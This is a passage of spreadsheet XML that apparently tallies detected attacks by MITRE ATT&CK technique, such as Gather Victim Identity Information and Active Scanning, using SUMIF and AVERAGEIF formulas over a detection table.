        <f t="shared" ref="BK68:BK79" si="24">BJ68 &amp; " (" &amp; BI68 &amp; ")"</f>
        <v>460 (611)</v>
      </c>
      <c r="BL68" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>6</v>
      </c>
      <c r="BM68" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>459</v>
      </c>
      <c r="BO68" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>14512</v>
      </c>
      <c r="BP68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>14361</v>
      </c>
      <c r="BQ68" s="4" t="str">
        <f t="shared" ref="BQ68:BQ79" si="25">BP68 &amp; " (" &amp; BO68 &amp; ")"</f>
        <v>14361 (14512)</v>
      </c>
      <c r="BR68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>6</v>
      </c>
      <c r="BS68" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>3</v>
      </c>
      <c r="BT68" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU68" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B68,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>6951</v>
      </c>
      <c r="BV68" s="292">
        <v>696786</v>
      </c>
      <c r="BW68" s="322">
        <v>7026</v>
      </c>
      <c r="BX68" s="4" t="str">
        <f t="shared" ref="BX68:BX78" si="26">BW68 &amp; " (" &amp; BV68 &amp; ")"</f>
        <v>7026 (696786)</v>
      </c>
      <c r="BY68" s="12">
        <v>2</v>
      </c>
      <c r="BZ68" s="13">
        <v>1</v>
      </c>
      <c r="CA68" s="394">
        <v>6941</v>
      </c>
      <c r="CB68" s="288">
        <v>1393572</v>
      </c>
      <c r="CC68" s="4">
        <v>13967</v>
      </c>
      <c r="CD68" s="4" t="str">
        <f t="shared" ref="CD68:CD78" si="27">CC68 &amp; " (" &amp; CB68 &amp; ")"</f>
        <v>13967 (1393572)</v>
      </c>
      <c r="CE68" s="4">
        <v>2</v>
      </c>
      <c r="CF68" s="4">
        <v>1</v>
      </c>
      <c r="CG68" s="13">
        <v>1</v>
      </c>
      <c r="CH68" s="394">
        <v>6941</v>
      </c>
    </row>
    <row r="69" spans="1:98" ht="15" customHeight="1">
      <c r="A69" s="4">
        <f t="shared" ref="A69:A78" si="28">A68+1</f>
        <v>67</v>
      </c>
      <c r="B69" s="4" t="str">
        <f>IFERROR(VLOOKUP(A69,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1589</v>
      </c>
      <c r="C69" s="4" t="str">
        <f>IFERROR(VLOOKUP(B69,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Gather Victim Identity Information</v>
      </c>
      <c r="D69" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B69)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F69" s="286" t="str">
        <f t="shared" ref="F69:F78" si="29">D69&amp;" ("&amp;E69&amp;")"</f>
        <v>1 (7)</v>
      </c>
      <c r="G69" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>14</v>
      </c>
      <c r="H69" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>7</v>
      </c>
      <c r="I69" s="322" t="str">
        <f t="shared" si="15"/>
        <v>7 (14)</v>
      </c>
      <c r="J69" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K69" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>7</v>
      </c>
      <c r="M69" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N69" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O69" s="322" t="str">
        <f t="shared" si="16"/>
        <v>0 (0)</v>
      </c>
      <c r="P69" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q69" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S69" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>14</v>
      </c>
      <c r="T69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>7</v>
      </c>
      <c r="U69" s="4" t="str">
        <f t="shared" si="17"/>
        <v>7 (14)</v>
      </c>
      <c r="V69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W69" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>7</v>
      </c>
      <c r="Y69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>14</v>
      </c>
      <c r="Z69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>7</v>
      </c>
      <c r="AA69" s="322" t="str">
        <f t="shared" si="18"/>
        <v>7 (14)</v>
      </c>
      <c r="AB69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC69" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>7</v>
      </c>
      <c r="AE69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>1</v>
      </c>
      <c r="AF69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>1</v>
      </c>
      <c r="AG69" s="322" t="str">
        <f t="shared" si="19"/>
        <v>1 (1)</v>
      </c>
      <c r="AH69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>1</v>
      </c>
      <c r="AI69" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>15</v>
      </c>
      <c r="AL69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>8</v>
      </c>
      <c r="AM69" s="322" t="str">
        <f t="shared" si="20"/>
        <v>8 (15)</v>
      </c>
      <c r="AN69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>2</v>
      </c>
      <c r="AO69" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>7</v>
      </c>
      <c r="AQ69" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR69" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS69" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT69" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU69" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY69" s="322" t="str">
        <f t="shared" si="22"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ69" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA69" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC69" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>14</v>
      </c>
      <c r="BD69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>7</v>
      </c>
      <c r="BE69" s="4" t="str">
        <f t="shared" si="23"/>
        <v>7 (14)</v>
      </c>
      <c r="BF69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>1</v>
      </c>
      <c r="BG69" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>7</v>
      </c>
      <c r="BI69" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ69" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK69" s="322" t="str">
        <f t="shared" si="24"/>
        <v>0 (0)</v>
      </c>
      <c r="BL69" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM69" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO69" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>7</v>
      </c>
      <c r="BP69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>7</v>
      </c>
      <c r="BQ69" s="4" t="str">
        <f t="shared" si="25"/>
        <v>7 (7)</v>
      </c>
      <c r="BR69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS69" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>1</v>
      </c>
      <c r="BT69" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU69" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B69,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>7</v>
      </c>
      <c r="BV69" s="292">
        <v>0</v>
      </c>
      <c r="BW69" s="322">
        <v>0</v>
      </c>
      <c r="BX69" s="4" t="str">
        <f t="shared" si="26"/>
        <v>0 (0)</v>
      </c>
      <c r="BY69" s="12">
        <v>0</v>
      </c>
      <c r="BZ69" s="13">
        <v>0</v>
      </c>
      <c r="CA69" s="394">
        <v>0</v>
      </c>
      <c r="CB69" s="288">
        <v>0</v>
      </c>
      <c r="CC69" s="4">
        <v>0</v>
      </c>
      <c r="CD69" s="4" t="str">
        <f t="shared" si="27"/>
        <v>0 (0)</v>
      </c>
      <c r="CE69" s="4">
        <v>0</v>
      </c>
      <c r="CF69" s="4">
        <v>0</v>
      </c>
      <c r="CG69" s="13">
        <v>0</v>
      </c>
      <c r="CH69" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:98" ht="15" customHeight="1">
      <c r="A70" s="4">
        <f t="shared" si="28"/>
        <v>68</v>
      </c>
      <c r="B70" s="4" t="str">
        <f>IFERROR(VLOOKUP(A70,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1595</v>
      </c>
      <c r="C70" s="4" t="str">
        <f>IFERROR(VLOOKUP(B70,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Active Scanning</v>
      </c>
      <c r="D70" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B70)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2574</v>
      </c>
      <c r="F70" s="286" t="str">
        <f t="shared" si="29"/>
        <v>3 (2574)</v>
      </c>
      <c r="G70" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>224</v>
      </c>
      <c r="H70" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>224</v>
      </c>
      <c r="I70" s="322" t="str">
        <f t="shared" si="15"/>
        <v>224 (224)</v>
      </c>
      <c r="J70" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>7</v>
      </c>
      <c r="K70" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="L70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>214</v>
      </c>
      <c r="M70" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>57</v>
      </c>
      <c r="N70" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>56</v>
      </c>
      <c r="O70" s="322" t="str">
        <f t="shared" si="16"/>
        <v>56 (57)</v>
      </c>
      <c r="P70" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>27</v>
      </c>
      <c r="Q70" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="R70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>39</v>
      </c>
      <c r="S70" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>281</v>
      </c>
      <c r="T70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>280</v>
      </c>
      <c r="U70" s="4" t="str">
        <f t="shared" si="17"/>
        <v>280 (281)</v>
      </c>
      <c r="V70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>34</v>
      </c>
      <c r="W70" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="X70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>235</v>
      </c>
      <c r="Y70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>9830</v>
      </c>
      <c r="Z70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>1182</v>
      </c>
      <c r="AA70" s="322" t="str">
        <f t="shared" si="18"/>
        <v>1182 (9830)</v>
      </c>
      <c r="AB70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>34</v>
      </c>
      <c r="AC70" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>480</v>
      </c>
      <c r="AE70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>427</v>
      </c>
      <c r="AF70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>352</v>
      </c>
      <c r="AG70" s="322" t="str">
        <f t="shared" si="19"/>
        <v>352 (427)</v>
      </c>
      <c r="AH70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>52</v>
      </c>
      <c r="AI70" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>189</v>
      </c>
      <c r="AK70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>10257</v>
      </c>
      <c r="AL70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>1534</v>
      </c>
      <c r="AM70" s="322" t="str">
        <f t="shared" si="20"/>
        <v>1534 (10257)</v>
      </c>
      <c r="AN70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>120</v>
      </c>
      <c r="AO70" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>494</v>
      </c>
      <c r="AQ70" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR70" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS70" s="322" t="str">
        <f t="shared" si="21"/>
        <v>0 (0)</v>
      </c>
      <c r="AT70" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU70" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>67</v>
      </c>
      <c r="AX70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>66</v>
      </c>
      <c r="AY70" s="322" t="str">
        <f t="shared" si="22"/>
        <v>66 (67)</v>
      </c>
      <c r="AZ70" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>46</v>
      </c>
      <c r="BA70" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0.66666666666666663</v>
      </c>
      <c r="BB70" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>41</v>
      </c>
      <c r="BC70" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>348</v>
      </c>
      <c r="BD70" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B70,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>346</v>
      </c>
